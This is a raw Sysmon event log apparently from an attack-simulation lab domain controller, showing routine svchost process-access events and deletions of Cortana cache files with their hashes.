12:02:17.523{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.523{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.523{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{48A82B41-50A4-42D7-B403-B5D5FC29426F}MD5=164DF3D6F46E23E2FA08C9D8B57D071C,SHA256=2CEAF005435274273EB097157EA09E468BCD39ED9A7D63ECD04A0C6986B1528C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.523{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{3F7F98FC-AA70-447B-8115-EB5A44909800}MD5=F4AF1310D8D92B88BAB00ECA2F49C398,SHA256=3130C6EC89917106856DA972EA6157791A6F8DD405164F86B7EF73F849A158DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{3A0E2E7D-9FED-42CB-8877-33CF7980ECDA}MD5=544AC2AEF10A0AAC6646D5D372CC839A,SHA256=E402AAF80000D1AE4C9C731B2D45E9E1D707C1F9ED0935EF065968C47306E85E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{38A89348-B3AE-479E-9816-8957D41F333A}MD5=7E65C5A57A575C58A5405595565EA22E,SHA256=9FA31C4A02F57CEF0DE517567F7D218DA51B530A387E6198F25B60967C43AEA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{33E693A3-517A-4347-A45E-3E8F1A25B030}MD5=1A1A2950F1D4A9770DF78E6CD2BCACC2,SHA256=28EA58D31BC5379C5760FC79481AFFAD0E1A132AAC6C794D8C849D6BDED9AE1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{3039DC32-E634-4F64-AD60-9038F8E7D74E}MD5=D073912E2B55F885ADC380FB3849A88D,SHA256=3D6632DD180019CC415F024A5C0724886E4F5E90116E78F5B390E09475C8A1C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{2D2370BB-9EFA-4648-B021-63A266D97A51}MD5=B590C6A1DBD4BAE99FED3744E0898536,SHA256=FEA47174536A406B031F040F394417218427405C4EB30558D6126A1AA79F6005,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000005122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{24A5753E-C22E-49F4-BC08-F780BC6B1286}MD5=F3EFEAA4A73DB4D7D39C729FDE3305A7,SHA256=8C33FC0D66799635812F0F5F96B35C699ACAC5753DB1FFA89DA9520C81CAE9F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1F6412A2-2B23-4074-A89D-9586B3CFBF11}MD5=9A987ABDC3B59D4D4E488190C758BC8A,SHA256=F9B1BF1FC533A009213B23911DBA90DF8E914BB93C458D7A86C89D8546AE1FEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.492{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1CC42A14-06FE-4766-987D-39817BF3005F}MD5=3700764E031A12B2220A2C082EF7BBBE,SHA256=A772660D39E4150FB6017A0FDBDE096EB17128774678A018BFFEDCDB507101F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.492{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{19AC3423-5AC0-4CD7-9E2B-DB6C0DECE3C4}MD5=9001B10995D8FDABC78945D7B210649D,SHA256=92818CA4F5FB7F3808ABFDE9EFED7E2292FBE9195366132EDB50F3A246CA00B9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.492{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.492{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.492{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{03152E59-DE8A-4AF5-8757-7FF15DC09A3C}MD5=25917526232EBDB7DE54634BFB5E6A33,SHA256=467251FCB3C564947AA615B69ECFC765763BBAA61B47CA13FD1895307E30125E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.492{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.476{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].pngMD5=A98EF91236D0A680740A3C0F10937087,SHA256=660FDBEDE1BFFF4F5F322F2DD862445A2BE9101828A32013843E5F6E0320D804,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.476{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].htmlMD5=CDD4A14258DC43D22C37F1E721AEC245,SHA256=0D9E19723D9ED66DD13CB8657808963130BAD94249F03228CCC68BB32FC360C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.476{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\appcache[1].manMD5=9C09D8D73BB5BB4E83BE6D75D117BCDA,SHA256=F34BC09B3486A486AABF2BE3A3E6728A5FCD17821CAF41CFAC78CE85A63C6AC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.476{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txtMD5=F98851A644D901C32D1152CF001C2A30,SHA256=8A450F4631B7F451F470B7E7EF723A872C962749001C75AB1E9A01FC2765766A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.460{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txtMD5=5B7A3FBF6CE7627737B7AE8F7F73AF2B,SHA256=E5C8A584A8EF5082455DF1B7D986CDF9160F0A5AFA0EC6FD360EAAB9A1A8C5C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.460{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txtMD5=FF638505C57813F0F9115CB2F853BC07,SHA256=18695997D547308B565AA0D9AC8FDF8981966A47AF431DCC943BCC882AB6ECB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.460{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txtMD5=E68A5D04BF606560BDC326154A025956,SHA256=C32FBB255C914DA8336038933E799C5FEC8D50A0661B78DAB9E312131E7B7637,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.460{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txtMD5=10D7D30E23DBC108EC78C03F9E741566,SHA256=99355DBE0DDE1F5390AF8BA6FEB736E85B00C13E8D08B560DFE2D7EC5465E8C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.460{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txtMD5=D20D4B52F55421E4F0EE293FA394F274,SHA256=6594DB803F6BEAC699E3B4FE1BFFF9F1A6C8B7D1CB43A9A92A7D6979EE62B9ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.460{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txtMD5=766B33AB225A94D22C45803D32D1D2C4,SHA256=8BF750226E7E4720AFCD86820D0752946ABB11DB79EF62AFFA61EEC941AB5C20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.445{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txtMD5=6B559E6B268CC53FC0293A706E970550,SHA256=9179C223831AE54A2A21E24B1BDBD1D06C00098FA2A664F476756CEFA56C71E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.445{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txtMD5=87C5803AC86277335317BEEC5B252EF0,SHA256=8F7211EC0F4E0532DB653FECB4F605EB4C3C6C9879B138185DB4AAF7245646BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.445{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txtMD5=1DE957E6ECB8E53F1849E98E56D5D8F8,SHA256=D60A1010C3D82CAABA7C755C3A6423D7A268BCDC9EA4F27B10E8E14FD84ACD24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.445{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txtMD5=A6A758B9A843A9AE35166154D051C654,SHA256=59BEC20EBDB4ABAD19803E90044333A5781C755A3DDC0663A4A95E88AA0F45DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.445{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7213F95045C33C65F6877413CF1EC549,SHA256=DE470077BD70A5EF74EE7FBB07DABDBC71DD021CEFF05751A044C0453AB59A22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.429{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txtMD5=4EA6D9CCAE439451E3EDC69589C21F52,SHA256=115EE9EFD86B0AB505977609DBC1409CAD55275ED187667B37C1F7453406AA7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.429{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txtMD5=7F25769992DF13C241A1F14C72781B7F,SHA256=C3F1170A49C7EE2CF721D222FA1F766543D0F69BBCB35BFA2C64453025365DA1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
